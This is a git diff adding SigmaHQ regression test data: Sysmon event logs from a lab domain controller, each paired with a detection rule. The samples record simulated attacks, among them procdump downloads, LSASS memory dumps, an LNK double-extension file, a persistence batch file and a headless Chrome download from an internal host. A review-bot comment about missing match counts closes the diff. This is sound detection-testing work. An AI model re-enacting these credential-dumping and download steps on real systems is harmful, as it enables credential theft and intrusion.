d5866ddf-ce8f-4aea-b28e-d96485a20d3d + title: Files With System Process Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx
new file mode 100644
index 000000000..b1b8d69f5
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json
new file mode 100644
index 000000000..c5be894a5
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json
@@ -0,0 +1,306 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.136421Z" + } + }, + "EventRecordID": 26359, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.134", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe", + "CreationUtcTime": "2025-10-24 23:43:34.134", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.154339Z" + } + }, + "EventRecordID": 26362, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": 
"5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.160852Z" + } + }, + "EventRecordID": 26366, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe", + "CreationUtcTime": "2025-10-24 23:43:34.145", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.177439Z" + } + }, + "EventRecordID": 26369, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 
+ } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.177", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.183790Z" + } + }, + "EventRecordID": 26373, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.178", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe", + "CreationUtcTime": "2025-10-24 23:43:34.178", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, 
+ "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.211790Z" + } + }, + "EventRecordID": 26376, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.209", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml new file mode 100644 index 000000000..a5cb1267d --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml @@ -0,0 +1,13 @@ +id: ef67d58b-a7c2-434f-af87-34ae280a2968 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 + title: Cred Dump Tools Dropped Files +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx
new file mode 100644
index 000000000..b03d00a13
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json
new file mode 100644
index 000000000..9a8ee4004
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:45:24.807660Z" + } + }, + "EventRecordID": 28881, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:45:24.804", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\lsass.dmp", + "CreationUtcTime": "2025-10-24 23:45:24.804", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml new file mode 100644 index 000000000..0850ca601 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml @@ -0,0 +1,13 @@ +id: 5640730a-30d1-4aca-9ad3-dbb9000bb091 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c + title: Potentially Suspicious DMP/HDMP File Creation +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx
new file mode 100644
index 000000000..55bd83fe1
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json
new file mode 100644
index 000000000..615f60c7b
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:54:01.546728Z" + } + }, + "EventRecordID": 86290, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:54:01.546", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\evil.doc.lnk", + "CreationUtcTime": "2025-10-24 23:54:01.546", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml new file mode 100644 index 000000000..e82d1a336 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml @@ -0,0 +1,13 @@ +id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3215aa19-f060-4332-86d5-5602511f3ca8 + title: Suspicious LNK Double Extension File Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx
new file mode 100644
index 000000000..5c79f4658
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json
new file mode 100644
index 000000000..1895a93a5
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:52:38.278829Z" + } + }, + "EventRecordID": 74174, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:52:38.276", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Users\\Public\\persistence.bat", + "CreationUtcTime": "2025-10-24 23:52:38.276", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml new file mode 100644 index 000000000..4886f7841 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml @@ -0,0 +1,13 @@ +id: 9556b96b-462a-4238-a0bf-5e11ff0408fe +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e + title: Suspicious Binaries and Scripts in Public Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx
new file mode 100644
index 000000000..17b2b288b
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json
new file mode 100644
index 000000000..6852f7618
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:51:54.709878Z" + } + }, + "EventRecordID": 67705, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:51:54.705", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\RECYCLERS.BIN\\malware.exe", + "CreationUtcTime": "2025-10-24 23:51:54.705", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml new file mode 100644 index 000000000..92e45724e --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml @@ -0,0 +1,13 @@ +id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + title: Suspicious File Creation Activity From Fake Recycle.Bin Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx
new file mode 100644
index 000000000..b74cf1217
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json
new file mode 100644
index 000000000..811d5f7a9
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:50:20.590884Z" + } + }, + "EventRecordID": 53968, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:50:20.576", + "ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002", + "ProcessId": 2956, + "Image": "C:\\Windows\\system32\\taskmgr.exe", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP", + "CreationUtcTime": "2025-10-24 23:50:20.576", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml new file mode 100644 index 000000000..13c91674b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml @@ -0,0 +1,13 @@ +id: 55db307d-4a36-4594-bea8-7d114714d3b4 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 69ca12af-119d-44ed-b50f-a47af0ebc364 + title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx
new file mode 100644
index 000000000..56a66952d
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json
new file mode 100644
index 000000000..796430f09
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:20:06.319147Z" + } + }, + "EventRecordID": 32822341, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:20:06.307", + "ProcessGuid": "5AA13A44-ACA6-68FE-DE5D-000000004002", + "ProcessId": 9184, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --headless --enable-logging --disable-gpu --dump-dom \"http://10.0.1.14/nas.txt\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } 
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml
new file mode 100644
index 000000000..3b5f80023
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml
@@ -0,0 +1,12 @@
+id: 941b970d-535f-4543-8985-768e589fa8ff
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
+ title: File Download with Headless Browser
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx
new file mode 100644
index 000000000..8c5b800c8
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json
new file mode 100644
index 000000000..aea7029d1
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json
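Review bot: `regression_tests_info` in this info.yml carries no `match_count`, whereas every file_event info.yml earlier in this change sets `match_count: 1`; the chromium_load_extension, chromium_mockbin_abuse, chromium_susp_load_extension and browsers_inline_file_download info.yml files have the same omission. The runner's default for an absent count is not visible from here, but if it means "at least one match", a later rule change that fires twice on this single-event sample, or one that stops firing while another rule still does, would not be reported as a regression. Add `match_count: 1` between the `provider:` and `path:` lines in each of these five files so the positive tests check the same condition across both log sources.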
